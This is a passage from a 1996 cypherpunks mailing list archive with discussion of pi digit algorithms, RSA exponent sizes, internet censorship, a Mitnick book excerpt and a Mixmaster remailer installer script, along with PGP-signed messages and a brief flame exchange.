SdltRmAjLspP13LlgY7r43n+ymk+4qQCFumYVBPN+7NprFc2zMiSDtZNQpLUeLjX
oNHaHYUNa+c=
=m9ul
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 6 Jan 1996 14:23:23 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: Pi Stuff
Message-ID: <m0tYMQF-0008ykC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 01:15 PM 1/5/96 -0800, you wrote:
>Various amazed people on the Pi thread wrote:
>
> > But BTW, isn't it interesting, that news item from a few
> > weeks ago, on an algorithm for determining individual bits
> > in Pi, regardless of whether you've calculated all the
> > previous ones.  Only problem is, it only works in
> > hexadecimal (and, obviously, binary, etc, not decimal.

>A few quick comments.  The notion that one might be able to
>compute digits of Pi efficiently at any starting point in the
>number is not late-breaking news.  The Chudnovsky brothers
>developed a formula which permitted them to do this a number of
>years ago, and used it to compute Pi to several billion digits.

While I'm not an expert at this, I think you're misrepresented the Chudnovsky result.  They formulated an equation that allowed "you" to continue the calculation past "N" digits as long as you had the result that far.  As far as I know, they DID NOT generate any formula for the generation of isolated digits of pi, the more recent news. 

I'm signing this message after having turned off word-wrap in Eudora.  I'm told this my help my clearsigning process.  Could somebody verify this?

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAi1zvWcAAAEEAKmSqngLWK2N2gOJKPtjF9VCfSkXY+XUZBRCbbFU71uH/dLX
C2Uq6wFS8alRgMc3rp90JnnJ/6eJqXwMjCunogwucWOaU7S/w+OwjOG9fUqsXIA6
2j25Wtjce65mbp0TKLAzwMb/P/Qq7BlclqhuKzfVBH7dIHnVAvqHVDBboB2dAAUR
tBFKYW1lcyBEYWx0b24gQmVsbA==
=G3LA
- -----END PGP PUBLIC KEY BLOCK-----


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO3ArPqHVDBboB2dAQFXfQP+OhdkTw+3TFF4x97Or4hBRGSCd015+ZfJ
1wTov5MuKgfHlVEqml02mi3RJQSD1WYryysMkcQKrGS+X6IULolxtasKrXEUBw5P
fIiEAc+ueY68XZULGTL0IpsUDhUYXTWRaP9l64iELrdtmvtDQAd0zxfGDAoeyhvO
goZCWxWXUqs=
=ZGyP
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Sat, 6 Jan 1996 08:32:18 +0800
To: <cypherpunks@toad.com>
Subject: Re: More Noise Sphere Noise (simple source code)
Message-ID: <199601051644.LAA01347@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 05 Jan 96 07:24:03, I wrote:

>Ok, no language holy wars.  This was quickie to test out
>the Noise Sphere plotting.  It's in Pascal, but it's
>understandable.

>{ Simple demo of a Noise Sphere in Turbo Pascal         }
>{ (If only I had a really awful RNG to test it with...) }

Odd... That came through on the mail/news gateway but the preceeding
article that explains what that was about didn't.... did anyone
receive it?

In case no, it's based on Clifford A. Pickover's paper "Random Number
Generators: Pretty Good Ones are Easy to Find" which doesn't deal with
useful RNGs for crypto sense, but the paper does explain ways to
visually represent RNGs so that seemingly good RNGs show their awful
correlations, etc.

My previous post that should have showed up mentioned that these
methods might be useful for checking out crypto functions (hashes,
pRNGs, ciphers).

The full reference is The Visual Computer (1995) 11:369-377, Springer
Verlag, 1995.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Sat, 6 Jan 1996 06:57:56 +0800
To: Tony Iannotti <tony@secapl.com>
Subject: Re: Massey, CEO of Compuserve, on Internet
Message-ID: <v02140a03ad127fe5f8da@[165.254.158.214]>
MIME-Version: 1.0
Content-Type: text/plain


At 13:55 1/4/96, Tony Iannotti wrote:

>On Thu, 4 Jan 1996, Robert A. Rosenberg wrote:
>
>> Yes it would require that the Node be checked in the Software. What I was
>> responding to was a claim that there is no way of telling where I am
>> connecting from (which I disproved). As to calling a non-German Node, that
>> is always an option.
>
>Yes, I agree. I think the real difference is that they really cannot tell
>where you are calling from, even though they know where you are
>connecting.

Since the German Government (or the local "DA" who is claiming to represent
the National Government <g>) is talking about delivery of banned items in
Germany, I think that the relevant location is the node that is being used
not where the other end of the call to that node is located. What is being
requested is that CIS refrain for delivering the stuff to the Nodes in
Germany (they are not being told to monitor someone in Germany who is
trying to get it by calling LD to a node in France (or the US for that
matter).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Marc J. Wohler" <mwohler@ix.netcom.com>
Date: Sat, 6 Jan 1996 07:05:06 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199601052142.NAA22262@ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Anyone know of the staus of the Phil Zimmermann Grand Jury investagation?
Is there a Statuate of Limitations or what?


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMO2XK2eikzgqLB7pAQE6wgQAg7bs/b9qkayCQSUz8Ql8vcVNF74cSAl+
TRs/HQWA8g99x5j0Boircf7kpO8LR8orFkHdsSApYWCOCTDTHpiQNmcLYcSbTiFn
td3cJsponuKLa0qTjRpo3e+yIo8ebDC1tCrJaFXTZD8hHGLchr+rz8CLJR8R7pLS
LxYr3TFMM3s=
=x1Al
-----END PGP SIGNATURE-----
***Preserve, Protect and Defend the private use of Strong Crypto***
                 * * * PGP for the masses * * * 
Finger mjwohler@netcom.com for Marc Wohler's public key
fingerprint= F1 70 23 13 91 B5 10 63 0F CF 33 AD BE E6 7B B6





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Sat, 6 Jan 1996 08:54:30 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: 2047 bit keys in PGP
In-Reply-To: <199601051026.VAA20257@sweeney.cs.monash.edu.au>
Message-ID: <199601052219.RAA24875@opine.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jiri Baum writes:
> This is not really the case. The way PGP is set up, the operations
> that take a long time are those that involve the secret key - signing
> and decrypting. Encrypting and checking signatures are much quicker.
> 
> In other words, the person that chooses the key is the one that'll
> be most delayed.
> 
> (I think it's something to do with the relative sizes of the exponents.)

Right. We can (generally) make a "small" choice of the public exponent e, with
a corresponding "large" choice of the private exponent d, rather than having
them both "medium-sized". A "small" choice of d, however, would be easy to 
guess, which is a Bad Thing (tm).

Futplex <futplex@pseudonym.com>
*** Welcome to Cypherpunks -- Now Go Home ***

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMO2jkinaAKQPVHDZAQF7BAf/XrZ+abVfAw2Vle/8yomUZkC1Ol35g2yf
gx6QKEkPDwEhw2B1qUJPA0veJmU4wGoXO5dOjsDkUtPtCU4StBVu2Axo2Hf1cknz
raBWi/htN7xxKdeZ9+xiYduN3QQxwAhot8yTuaXqwswgjDwWjS4JJvfMG49lEqEN
PGVHbYHKYlIumjzgLE5TbQ58EkNWmOw/BqojniTDyf98+5tZz0t2gx+ezLMG1S9C
b12uCrw+EMmS7JDM+197xP+7JenXJUL41REVUAOVlcKh4TBLVFkRtzWa8Bt6vbPk
A7XiFKE9PdjzaOOUo1M2lI8ocz5nq7PysghSt8UzBGDDvUmIWd+0RQ==
=h4Li
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 5 Jan 1996 14:41:30 +0800
To: cman@communities.com (Douglas Barnes)
Subject: Re: Why Net Censorship Doesn't Work
In-Reply-To: <v02120d03ad0f6483762e@[199.2.22.120]>
Message-ID: <199601050621.RAA19851@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Duncan Frissell <frissell@panix.com>
  and cman@communities.com (Douglas Barnes)
  and cypherpunks@toad.com
 
...
> A quote from Star Wars (which I'm just now incorporating into my .sig)
...
> ------                                                           , ------
> Douglas Barnes         "The tighter you close your fist, Governor Tarkin,
> cman@communities.com    the more systems will slip through your fingers."
> cman@best.com                                             --Princess Leia

Perhaps not the most comforting quote you could have used...

If I remember my Star Wars correctly, Tarkin's reply consisted
largely of blasting Alderaan out of existence.


Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMOzDRyxV6mvvBgf5AQGwzAP/RSujB74fLHKzgTQOISNzEWBhZwzL4jrV
sS0B/K32osfy911ahWuUeq7RO5s4WDum4+8ptC65IQDwmZ4xEYz+lNANb5I2MKso
4ICZjeKi5Mfb/vzI0RnGxhTGPQsrlvs32qXtE066hw7QibjAY3wRC08OFsqullR9
oL6RPrfgVCQ=
=uMhK
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve14571@aol.com
Date: Sat, 6 Jan 1996 07:33:34 +0800
To: dreschs@austnsc.tandem.com
Subject: Re: FreeBSD user <fb@sponsor.octet.com>
Message-ID: <960105181333_32916749@mail02.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 96-01-04 18:44:46 EST, you write:

>	Am I the only one who has received three unreadable
>messages from this address on cypherpunks?

No, I have them too...  What is going on?

Pvt Stephen Herbert
United States Marine Corps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Rose <Greg_Rose@sydney.sterling.com>
Date: Fri, 5 Jan 1996 15:34:38 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Representations of Pi, etc.
In-Reply-To: <ad11fe741202100469b4@[205.199.118.202]>
Message-ID: <pgpmoose.199601051817.16090@paganini.sydney.sterling.com>
MIME-Version: 1.0
Content-Type: text/plain


  At 3:19 AM 1/5/96, jim bell wrote:

  >But BTW, isn't it interesting, that news item from a few weeks ago, on an
  >algorithm for determining individual bits in Pi, regardless of whether
  >you've calculated all the previous ones.  Only problem is, it only works in
  >hexadecimal (and, obviously, binary, etc, not decimal.
                                             ^^^^^^^^^^^

  ???

  I didn't see this result you mention, but it surprises me. The part about
  how it works in some bases, but not in decimal.

I assume it really works only in binary, and
hexadecimal follows, not the other way around.

  The "hand-waving" (motivational/informal) explanation for why I am
  surprised is that "Nature doesn't care about bipeds with 10 digits vs.
  bipeds, or whatever, with 2 digits or 16 digits." That is, results
  applicable in base 16, hexadecimal, should be easily applicable in base 10.

Sorry, but it is quite possible for this to be the
case. (I don't know for sure whether this is one
of them or not, though, having not seen the result
myself.) But assume for the moment that the
formula, or algorithm, or whatever it is, really
does tell you exactly the value of a contiguous
chunk of "bits", real honest-to-god binary digits.
You cannot translate these to a decimal
representation without knowing all of the bits
leading up to them. For example, you know the last
four bits of an eight bit string:
  XXXX0011

In Hex the last digit is 3. But what is the last
digit in decimal? If the 'X's are all 0, it is 3, but
if the last X is a 1 (making the number 00010011 = 19),
it is not 3 but 9. If only the first X is a one,
it is 1.

There are plenty of places in information theory
where a log base 2 shows up, so I don't doubt
that there might be an algorithm for determining
a particular "bit" of Pi. But just to prove I
have a more concrete example, suppose you have an
encrypted bank transfer, with the numbers
expressed in binary. Further suppose you know it
is encrypted with a one-time-pad (just to be
contraversial) where you know a particular n-bit
chunk of the pad. Given this you can recover the
corresponding n-bit chunk of the amount, but
unless this spans the entire number you can't
express this unambiguously in decimal digits.
This is a simple consequence of the fact that
log(2) and log(10) are not integer multiples of
each other (you know what I mean). The same goes
the other way, of course. Given a string of
decimal digits extracted from the middle of a
number, I can't unambiguously decide what string
of bits these would become without knowing the
rest of the number.

The result is fascinating, assuming it is real.

Greg.

Greg Rose               INTERNET: greg_rose@sydney.sterling.com  
Sterling Software       VOICE:  +61-2-9975 4777    FAX:  +61-2-9975 2921
28 Rodborough Rd.       http://www.sydney.sterling.com:8080/~ggr/
French's Forest         35 0A 79 7D 5E 21 8D 47  E3 53 75 66 AC FB D9 45
NSW 2086 Australia.     co-mod sci.crypt.research, USENIX Director.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 6 Jan 1996 07:53:52 +0800
To: cypherpunks@toad.com
Subject: Re: New Mitnick Book
Message-ID: <199601052331.SAA07024@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Responding to msg by bdavis@thepoint.net (Brian Davis) on Fri, 
5 Jan  3:4  PM


   Here's Littman on what the Feds knew about Markoff at
   Raleigh (Orsak and Murphy are with Sprint Cellular; Kent
   Walker was US Attorney in San Francisco):


   Monday afternoon, Special Agent LeVord Burns sits by the
   coffee pot and vending machine at the Sprint switch and
   debates the legal issues with Shimomura. "Tsutomu wanted us
   to kick his door down," recalls Orsak, who along with
   Murphy, listened in. "Burns was talking about what warrants
   had been issued, what the FBI was going to do."

   Burns impresses Orsak. A well-built, bespectacled black man
   in a suit and tie, Burns looks like the kind of FBI agent
   that doesn't miss details. As Burns recounts Mitnick's
   background, Orsak is surprised by what the agent says about
   Mitnick. "Burns said there were a lot of guys that as far
   as national security went were a lot more dangerous than
   Mitnick -- that a lot of professional hackers are a lot
   more dangerous." To Orsak, cyberspace's Most Wanted Hacker
   doesn't sound all that threatening. "One of the more
   interesting things, I thought, was the FBI goes, 'As far as
   hackers go,' Mitnick was 'benign.' They didn't have
   evidence he was in it for the money."

   A little later, John Markoff and Shimomura's girlfriend,
   Julia Menapace, who just flew in, arrive at the switch.
   Orsak and Murphy invite Shimomura's team, Burns, and two
   other FBI agents from Quantico, Virginia, out to Ragazzi's,
   a casual Italian restaurant nearby. Orsak spreads out a
   Raleigh street plan on the checkered tablecloth and
   pinpoints Mitnick's location.

   "LeVord was telling us what his involvement was for the
   FBI," recalls Murphy. "It was light banter. LeVord assumed
   like we all did, that Markoff was just another guy out of
   California. Just another egghead. One of Tsutomu's."

   Markoff gets everyone's ear when he mentions Mitnick
   inspired the hit movie WarGames. "Markoff was filling us in
   on Mitnick's typical behavior, the different people Mitnick
   had run-ins with," recalls Murphy. "A guy in England, a guy
   in Princeton, one at Digital." Then, Markoff runs through
   some of Mitnick's aliases. One of the phony names rings a
   bell with Murphy. After dinner, the whole crew heads back
   to the switch, and just as Murphy suspected, he finds a
   memo describing a recent attempt by someone using the alias
   to social engineer a new bunch of MINs.

   Meanwhile, the FBI is bumping up against a technical
   problem. The agents had planned to install the FBI's own
   bulky scanning equipment in a rental van, but they can't
   find one. Murphy suggests using his co-worker Fred's
   minivan. Burns gives the idea the green light, and Orsak
   helps the agents set up and calibrate their equipment in
   Fred's van.

   Around midnight, Fred chauffeurs the two agents to circle
   the cell site to calibrate their scanning equipment. Fred
   and the FBI agents get to talking.

   "He [Fred] let the cat out of the bag," confides Murphy.
   "We didn't tell him not to say anything. We weren't trying
   to hide it, but we were also not trying to convey it. He
   told them Markoff wrote a book on this guy."

   The boys from Quantico aren't happy.

   "They freaked," recalls Murphy. "They thought Markoff would
   tip the guy [Mitnick] so he could write another book."

   One of the Quantico agents phones the Sprint switch to
   confirm Markoff's identity. "Me, Markoff, Tsutomu, and
   Julia were at the switch," remembers Murphy. "One of the
   Quantico guys was on the phone. He wanted to talk to
   Tsutomu."

   Murphy passes the phone to Shimomura.

   "He [Shimomura] wasn't about to lie," says Murphy of the
   tense moment. "He [Shimomura] was trying to evade a little
   bit. He said that Kent Walker knew about Markoff being
   there, which of course Walker did."

   Murphy, Markoff, and Menapace listen to Shimomura.

   "Kent knows about it," insists Shimomura to the agent from
   Quantico. "He's cleared through Kent."

   But Kent Walker later denied ever giving Shimomura such
   approval or knowing John Markoff was in Raleigh. Shimomura
   later disputed Murphy's account and said he "never told
   anyone from law enforcement that anyone had authorized
   Markoff's presence in Raleigh."

   (pp. 357-58)








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Fri, 5 Jan 1996 16:02:43 +0800
To: groundfog@alpha.c2.org
Subject: Re: For the New Year: A Symbol for Information Freedom
In-Reply-To: <199601010311.WAA12624@mail.FOUR.net>
Message-ID: <199601050739.SAA19965@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello groundfog@alpha.c2.org
  and cypherpunks@toad.com
 
> In talk.politics.crypto, ptupper@direct.ca (Peter Tupper) wrote:
> >     A Symbol for Information Freedom
...
> >     The symbol I have chosen is the paper clip.
...

If you want to put one on your web page but can't be bothered drawing
it, I've got one at http://www.cs.monash.edu.au/~jirib


Take care!

Adiau - Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMOzVsyxV6mvvBgf5AQFZqwP/Yj/Gb0W5YqgTbHu99zPxOpyAFa7UC4NY
M7SCo8DSbnHsb13gT78Rm34irQtmzW5B9wJ97L+FeTFRBmqe8CX9dghjSDwNHdW/
yKKpnu9HtYXWkb6bNPbfDEexPq4Qs1q5DIukeGVIDeedOMQwUtOlsoLNVnyHExvV
zzYYPKPzjjY=
=RW1K
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@lighthouse.homeport.org>
Date: Sat, 6 Jan 1996 08:18:21 +0800
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Mixmaster In a Box
Message-ID: <199601060006.TAA20848@homeport.org>
MIME-Version: 1.0
Content-Type: text


	Towords the goal of making Mixmasters in a box, I've written
an installer script for mixmaster.  If you're running on one of the
supported platforms (alpha, bsdi, hpux, linux, sunos, solaris), the
script will walk you through everything from the make to setting up
cron jobs & /etc/aliases.

	If you've been putting off setting up a remailer because its a
pain, give this a shot.  Lance will probably be including it in the
next release of mixmaster, but you can get it now by sending me a
message with the Subject: get mix-installer.

	Comments, bugs, bug fixes are welcome.  Thanks to Rich $alz
for a extensive comments & suggestions for portability.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 6 Jan 1996 10:21:24 +0800
To: cypherpunks@toad.com
Subject: Big Bill: "You will be assimilated"
Message-ID: <ad1316eb180210044f73@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:37 PM 1/5/96, Duncan Frissell wrote:
>At 01:47 PM 1/5/96 -0500, Gordon Campbell wrote:
>>At 12:56 AM 1/5/96 -0500, Larry Sudduth wrote:
>>
>>>Attachment Converted: C:\WORK\WINMAIL.DAT
>>
>>What, pray tell, is this?
>>
>
>When a MS Mail attachment wanders around the world, it is accompanied by a
>data file of some kind.  That is winmail.dat.  So every MS MAIL attachment
>is really two attachments.  Try to ignore it.

You know, between Microsoft Mail, Microsoft Exchange, and other weirdnesses
associated with Microsoft, it's almost as if Big Bill (the guy in
Washington, but not D.C.) is trying to tell us be assimilated or face
continued pseudo-spamming.

(No insult to Microsoft intended, but other companies seem to understand it
is up to them to make efforts to comply with conventional Internet
standards, while MS seems to relish doing things its own way, the rest of
us be damned.)

I hate the thought of putting all Microsoft domain addresses in my kill
file, but at least it solves the problem.

--Tim May


We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 6 Jan 1996 10:39:41 +0800
To: cypherpunks@toad.com
Subject: Re: get mix-installer. (fwd)
Message-ID: <199601060223.UAA04181@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From adam@lighthouse.homeport.org Fri Jan  5 19:52:45 1996
> Date: Fri, 5 Jan 1996 20:55:25 -0500
> From: Adam Shostack <adam@lighthouse.homeport.org>
> Message-Id: <199601060155.UAA21106@homeport.org>
> To: ravage@ssz.com
> Subject: Re: get mix-installer.
> References: <199601060152.TAA04065@einstein.ssz.com>
> In-Reply-To: <199601060152.TAA04065@einstein.ssz.com>
> Precedence: junk
> 
> 

I followed the request information per the original posting by Adam and 
received this in reply.

This leads me to believe that Mr. Shostack is basicaly unwilling to fulfill
his own promises. My advice, avoid like the plague.

Caviat emptor.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 6 Jan 1996 10:39:34 +0800
To: cypherpunks@toad.com
Subject: Re: get mix-installer. (fwd)
Message-ID: <199601060224.UAA04211@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From adam@lighthouse.homeport.org Fri Jan  5 20:23:21 1996
From: Adam Shostack <adam@lighthouse.homeport.org>
Message-Id: <199601060225.VAA21165@homeport.org>
Subject: Re: get mix-installer.
To: ravage@ssz.com (Jim Choate)
Date: Fri, 5 Jan 1996 21:25:59 -0500 (EST)
In-Reply-To: <199601060152.TAA04065@einstein.ssz.com> from "Jim Choate" at Jan 5, 96 07:52:17 pm
X-Mailer: ELM [version 2.4 PL24 ME8b]
Content-Type: text
Content-Length: 367       

Jim Choate wrote:

| I would like a copy to use in my consulting business as well as put on the
| Austin Cypherpunks ftp site.

Both are fine.  I assume that a copy was auto mailed to you; let me
know if there is a problem.


May I ask who pays to get mixmasters installed?

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.dfw.net>
Date: Sat, 6 Jan 1996 20:07:46 +0800
To: John Young <jya@pipeline.com>
Subject: Re: Crypto Rules Report
In-Reply-To: <199601060141.UAA21362@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960105202950.16391A-100000@dfw.dfw.net>
MIME-Version: 1.0
Content-Type: text/plain



I'll be happy to provide an http site.

On Fri, 5 Jan 1996, John Young wrote:

>    In response to the December Financial Times article
>    "Encryption Rules Coming," about an international
>    cryptography meeting in Paris, and our request for
>    additional information, we have received from nobody:
> 
>       Report of the Business-Government Forum on Global
>       Cryptogoraphy Policy
> 
>       Held on 19-20 December 1995 in Paris
> 
>       Detailed Report
> 
>    The report includes meeting background information, notes
>    on the speakers articulation of the positions of industry
>    and governments, and four annexes:
> 
>    1. List of participants (EU, US, Japan -- biz and gov);
> 
>    2. Statement of Eurobit-ITAC-ITI-JEIDA which sets out
>       20 principles of global cryptographic policy;
> 
>    3. Statement by the Infosec Business Advisory Group (IBAG)
>       on 17 principles of international cryptography;
> 
>    4. The Mike Nelson Policy Problem (last point: "No one
>       trusts anyone.")
> 
> 
>    It would be great if someone would provide an FTP site. It
>    is about 31 kb.
> 
> 
> 
> 
> 
> 
> 
> 
> 

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 6 Jan 1996 10:57:36 +0800
To: cypherpunks@toad.com
Subject: Re: get mix-installer. (fwd)
Message-ID: <199601060231.UAA04264@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> From adam@lighthouse.homeport.org Fri Jan  5 20:23:21 1996
> From: Adam Shostack <adam@lighthouse.homeport.org>
> Message-Id: <199601060225.VAA21165@homeport.org>
> Subject: Re: get mix-installer.
> To: ravage@ssz.com (Jim Choate)
> Date: Fri, 5 Jan 1996 21:25:59 -0500 (EST)
> In-Reply-To: <199601060152.TAA04065@einstein.ssz.com> from "Jim Choate" at Jan 5, 96 07:52:17 pm
> X-Mailer: ELM [version 2.4 PL24 ME8b]
> Content-Type: text
> Content-Length: 367       
> 
> Jim Choate wrote:
> 
> | I would like a copy to use in my consulting business as well as put on the
> | Austin Cypherpunks ftp site.
> 
> Both are fine.  I assume that a copy was auto mailed to you; let me
> know if there is a problem.
> 
> 
> May I ask who pays to get mixmasters installed?
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume
> 

In a earlier message I received from Adam I mistook his auto-remailers
scripts responce as a refusal to supply the afformentioned code. I apoligize
for my ignorance and retract any negative statements or implications that I
may have made.

In the last year I have had a couple of local business people and about a
dozen individuals ask about remailers and using PGP. I currently have a
couple of state political activists in the gun lobby who have begun using it
for internal communications. I am hoping to have another machine installed
in the next couple of weeks with mixmaster available. It is my intention to
run a remailer here in Texas with the help of the local cpunks (I hope) in
order to demonstrate what the technology is capable of. I see this script as
a major advance in making the software more palatable to the general
populace. My current business plan is to educate several international
translaters I work with about the technology. They work with foreign patents
being applied for here in the US and they typicaly must sign non-disclosure
agreements to get the contracts. Such technology may be something they find
useful.

                                                 Jim Choate







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.dfw.net>
Date: Sat, 6 Jan 1996 20:52:38 +0800
Subject: Re: Crypto Rules Report
In-Reply-To: <199601060141.UAA21362@pipe1.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.960105203034.16391B-100000@dfw.dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	Sorry for the SPAM it was meant to go to John only. Typing to 
fast again....

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Sat, 6 Jan 1996 20:10:21 +0800
To: cypherpunks@toad.com
Subject: Re: get mix-installer. (fwd)
In-Reply-To: <199601060232.VAA09545@thor.cs.umass.edu>
Message-ID: <199601060236.UAA04326@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Who the fuck elected you reputation monitor. You should chill.

Please refrain from sending any more posts to me privately that are not
directly crypto related. I have better things to do than listen to your
rantings and raving. If Adam and I have a problem then we will work it out
without! your involvment.

                                                Jim Choate


> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> Jim Choate writes:
> > I followed the request information per the original posting by Adam and 
> > received this in reply.
> > 
> > This leads me to believe that Mr. Shostack is basicaly unwilling to fulfill
> > his own promises. My advice, avoid like the plague.
> > 
> > Caviat emptor.
> 
> Chill the fuck out (this obscenity brought to you by the U.S. Congress).
> 
> Adam has already posted an earlier version of the script to the Mixmaster
> mailing list. It's not vaporware. 
> 
> Besides, Adam has been around and contributing for quite a while. Smearing
> his rather excellent c'punk reputation because of (probably) a malfunctioning
> procmail recipe isn't terribly productive, or neighborly. 
> 
> Futplex <futplex@pseudonym.com>
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBMO3fBinaAKQPVHDZAQE3PQf/WbzMM67+nvUKyHzoeuFzk0/OCL/CxAFR
> 3BClrig/4CYZvEGLbaqZbhzjsQQ04Wgl39T4nntclU9TZpbvyvRPnat+rZuEl0xK
> cefKyfMCGvU1Ia92MdXzTYZYM5/7DHjVKo+rMBbKHiolrEKsTTsP7oo4Cgju25OQ
> ekPCqTyPeY+mO8e3pQd29h/oFJMte8hi8k9AJ88AhpEKlORETNx/mRYz17PtSHwF
> yUg82YbYY1YLGKXRnUON+FIgmSQo9VeFK1VQouvmX+7JA5BDwdrbz731ZZd4nvpj
> /JXK0zG5x2rkJgDmrNK4/HKEhnkS6lR/4NubojXFdJmv6UA+Cw++dQ==
> =1xgH
> -----END PGP SIGNATURE-----
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sat, 6 Jan 1996 10:22:20 +0800
To: cypherpunks@toad.com
Subject: Crypto Rules Report
Message-ID: <199601060141.UAA21362@pipe1.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   In response to the December Financial Times article
   "Encryption Rules Coming," about an international
   cryptography meeting in Paris, and our request for
   additional information, we have received from nobody:

      Report of the Business-Government Forum on Global
      Cryptogoraphy Policy

      Held on 19-20 December 1995 in Paris

      Detailed Report

   The report includes meeting background information, notes
   on the speakers articulation of the positions of industry
   and governments, and four annexes:

   1. List of participants (EU, US, Japan -- biz and gov);

   2. Statement of Eurobit-ITAC-ITI-JEIDA which sets out
      20 principles of global cryptographic policy;

   3. Statement by the Infosec Business Advisory Group (IBAG)
      on 17 principles of international cryptography;

   4. The Mike Nelson Policy Problem (last point: "No one
      trusts anyone.")


   It would be great if someone would provide an FTP site. It
   is about 31 kb.













From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tallpaul@pipeline.com (tallpaul)
Date: Sat, 6 Jan 1996 10:20:21 +0800
To: cypherpunks@toad.com
Subject: Mixmaster On A $20 Floppy?
